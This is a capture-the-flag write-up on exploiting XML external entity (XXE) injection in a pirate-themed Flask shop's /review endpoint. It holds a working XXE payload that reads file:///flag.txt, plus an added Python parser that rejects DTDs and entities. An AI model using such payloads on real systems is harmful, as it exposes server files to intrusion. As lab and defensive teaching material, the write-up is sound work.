Quartermaster Store

BearcatCTF by smothy

Quartermaster Store - Web

Points: 442 | Flag: BCCTF{N0_H0nor_AmonG_Th3vEs} | Solved by: Smothy @ 0xN1umb


what we got

Pirate-themed Flask shop at http://chal.bearcatctf.io:43363. Register, login, buy stuff with doubloons, play a minigame, submit reviews.

the solve

After registering and logging in, I noticed the nav has a /review endpoint. Checked the JS and lmao:

```javascript
const xmlPayload = `<?xml version="1.0"?>
<review>
    <product>${productName}</product>
    <rating>${rating.value}</rating>
    <comment>${reviewContent}</comment>
</review>`;

fetch('/review', {
    method: 'POST',
    headers: { 'Content-Type': 'application/xml' },
    body: xmlPayload
})
```

XML input going straight to the server? that's XXE all day fr

sent this bad boy:

```xml
<?xml version="1.0"?>
<!DOCTYPE review [
  <!ENTITY xxe SYSTEM "file:///flag.txt">
]>
<review>
    <product>&xxe;</product>
    <rating>5</rating>
    <comment>test</comment>
</review>
```

server reflected the flag right back in the flash message: Ye didn't buy any BCCTF{N0_H0nor_AmonG_Th3vEs} here matey!
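What the server side should have done, as an added example that is not part of this writeup or the challenge's code: a stdlib expat parser for the /review body that refuses any DOCTYPE, entity declaration or external entity reference, so the file:///flag.txt entity above is never resolved. The field names are the ones from the page's XML; the Flask handler around it is assumed.

```python
import xml.parsers.expat

REVIEW_FIELDS = ("product", "rating", "comment")

# Constructed samples: the challenge's XXE payload and a benign review.
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE review [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
<review><product>&xxe;</product><rating>5</rating><comment>test</comment></review>"""
SAFE_REVIEW = """<?xml version="1.0"?>
<review><product>Cutlass</product><rating>4</rating><comment>Sharp, matey</comment></review>"""


class ForbiddenXml(ValueError):
    """The review carried a DTD, entity declaration or external entity reference."""


def parse_review(xml_text: str) -> dict:
    """Parse <review> into {"product", "rating", "comment"}; any DOCTYPE, entity
    declaration or external reference aborts parsing before expat resolves it."""
    parser = xml.parsers.expat.ParserCreate()

    def forbid(*_args):  # wired to every DTD / entity event expat can report
        raise ForbiddenXml("DTD and entity declarations are not accepted")

    parser.StartDoctypeDeclHandler = forbid
    parser.EntityDeclHandler = forbid
    parser.ExternalEntityRefHandler = forbid
    fields, path, buf = {}, [], []  # collected text, open-element stack, text buffer

    def start(name, _attrs):
        path.append(name)
        buf.clear()
    def chars(data):
        if path and path[-1] in REVIEW_FIELDS:
            buf.append(data)
    def end(name):
        if name in REVIEW_FIELDS:
            fields[name] = "".join(buf).strip()
        path.pop()

    parser.StartElementHandler, parser.CharacterDataHandler, parser.EndElementHandler = start, chars, end
    parser.Parse(xml_text, True)
    if any(f not in fields for f in REVIEW_FIELDS):
        raise ValueError("review must contain product, rating and comment")
    rating = int(fields["rating"])
    if not 1 <= rating <= 5:
        raise ValueError("rating must be between 1 and 5")
    return {"product": fields["product"], "rating": rating, "comment": fields["comment"]}


def review_is_rejected(xml_text: str) -> bool:
    """True when parse_review refuses the document because it carries a DTD or entity."""
    try:
        parse_review(xml_text)
    except ForbiddenXml:
        return True
    return False
```

The handlers fire on the DOCTYPE itself, so the body is rejected before any entity is ever looked up; a plain review still parses into the three fields the shop needs.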

ngl that was too easy

flag

BCCTF{N0_H0nor_AmonG_Th3vEs}
smothy out ✌️